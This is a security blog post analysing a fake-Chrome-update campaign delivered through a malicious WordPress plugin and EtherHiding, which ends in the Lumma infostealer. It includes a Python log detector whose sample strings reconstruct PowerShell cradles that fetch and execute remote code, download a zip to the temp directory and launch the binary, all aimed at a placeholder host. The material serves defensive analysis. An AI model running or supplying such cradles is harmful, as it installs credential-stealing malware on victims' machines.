EtherHiding and Fake-Updates Used to Deliver Malware


By Anthony Jirouschek, Security Architect

We recently observed an attack using EtherHiding to deliver Fake-Updates malware, which eventually resulted in an infostealer named Lumma being installed.

EtherHiding is essentially the use of smart contracts on a crypto platform to obscure and deliver malicious code. In this case, the threat actor used Binance's Smart Chain contracts. EtherHiding is a relatively new technique that will likely remain in use as cryptocurrencies and their platforms gain followings. For this attack to work, the user has to be directed to the smart contract in order to be presented with the malicious logic. That is where Fake-Updates comes into play.

Fake-Updates trick the end user into downloading what they think is legitimate software, and typically mimic the pages of common software such as browsers. To be exposed, a user would need to browse to a compromised website, which executes the malicious JavaScript that displays the Fake-Update window or popup.

In the case we recently observed, a WordPress admin was compromised and then leveraged to install a malicious WordPress plugin. The plugin was masquerading as "GoogleRank", which purported to be a Google SEO plugin. This plugin would inject the malicious JavaScript that presents the user with a fake update for Google Chrome containing two buttons: "Copy Fix" and "Close".

Figure 1. Fake Google Chrome update page

The "Copy Fix" button contains a PowerShell cradle. If copied and executed by the user, it will start the infection chain.

Figure 2. De-obfuscated PowerShell cradle

The URL points to an HTML page, but the response is later executed with the IEX (Invoke-Expression) command, indicating that it might actually be plaintext rather than HTML.

Figure 3. De-obfuscated host.html

The host.html page is actually just another PowerShell cradle similar to Figure 2 with some extra commands. This cradle is attempting to download ssl.zip from the same website and "/apple/domain/" path as before using the same User Agent.

It then attempts to write the file into a randomly named directory in the user's temp directory. Once it's been written, it extracts the file from the archive and then sleeps for 2 seconds. Finally, it attempts to start the file that has been extracted. In this instance, it was a binary named "MetaTrader5.exe".
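
One way to flag the two cradle stages described above in PowerShell script block logs, as an added example that is not code from the original post. The cmdlet names and aliases, the `classify` helper and the sample commands are assumptions constructed for illustration, since the article shows the real commands only as figures.

```python
import re

# Behaviours the article describes for the two cradles. The cmdlet names and
# aliases below are assumptions; the article shows the commands only as figures.
RULES = {
    "web_download": r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile)\b",
    "invoke_expression": r"\b(Invoke-Expression|iex)\b",
    "html_url": r"https?://[^\s'\"]+\.html?\b",
    "zip_url": r"https?://[^\s'\"]+\.zip\b",
    "temp_path": r"\$env:TEMP|GetTempPath|\\AppData\\Local\\Temp",
    "expand_archive": r"\bExpand-Archive\b|ZipFile\]::ExtractToDirectory",
    "sleep": r"\bStart-Sleep\b",
    "start_process": r"\b(Start-Process|saps)\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

STAGE1 = {"web_download", "invoke_expression"}
STAGE2 = {"web_download", "zip_url", "temp_path", "expand_archive", "start_process"}


def classify(script_block: str) -> dict:
    """Label one logged script block and list the behaviours that matched."""
    hits = {name for name, rx in COMPILED.items() if rx.search(script_block)}
    labels = []
    if STAGE1 <= hits:
        # Remote content handed to Invoke-Expression; an .html URL is the
        # mismatch the article points out (a "page" that is run as script).
        labels.append("stage1-html-cradle" if "html_url" in hits else "stage1-cradle")
    if STAGE2 <= hits:
        labels.append("stage2-archive-dropper")
    return {"labels": labels, "hits": sorted(hits)}


# Constructed script-block text; host and directory names are placeholders.
SAMPLES = [
    'iex (iwr "https://site.example.invalid/apple/domain/host.html").Content',
    '$d = Join-Path $env:TEMP "RANDOM-DIR-PLACEHOLDER"; $z = Join-Path $d "ssl.zip"; '
    'iwr "https://site.example.invalid/apple/domain/ssl.zip" -OutFile $z; '
    'Expand-Archive $z $d; Start-Sleep 2; Start-Process (Join-Path $d "MetaTrader5.exe")',
    'Get-ChildItem $env:TEMP -Filter *.zip | Remove-Item',
    'Invoke-WebRequest "https://site.example.invalid/docs/readme.html" -OutFile readme.html',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample)["labels"], "<-", sample[:60])
```

The last two samples are benign look-alikes: touching the temp directory or saving an HTML file to disk is not flagged unless the other behaviours of a stage appear in the same script block.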

Figure 4. MetaTrader5.exe

If you have ever dabbled in Foreign Exchange (ForEx), you've probably heard of MetaTrader. If you haven't, MetaTrader is an application that allows you to trade various currencies and some stocks depending on the brokerage used. It's not obvious why the threat actor used the name MetaTrader as it likely would not apply to most people on the internet. What is clear is this likely isn't the MetaTrader app. So what is it?

Figure 5. SHA256 of MetaTrader5.exe - 0b502d9c21d2bed10365e82b1c85866360c215f61c7ea3b8ed4f5c34a18c656e

Checking the hash in VirusTotal shows the file has also been uploaded with the name "steam.exe". At the time of writing (11 days after originally discovering this chain), the file is detected by 50 of 74 vendors. Some of the vendors also classify this file as belonging to the Lumma infostealing malware family. Infostealers continue to be a threat as they can steal your personal data like passwords and credit cards from your device and upload it to the threat actors.

Figure 6. Attack Graph

For a complete list of IOCs and related activity, please use the VirusTotal link and your favorite sandbox, like Joe Sandbox, AnyRun, VMRay, etc.

If you have an issue you would like WYRE to investigate, please contact us.

This activity was originally reported by Mike Small, our Penetration Testing partner over at Tandem Cyber Solutions.
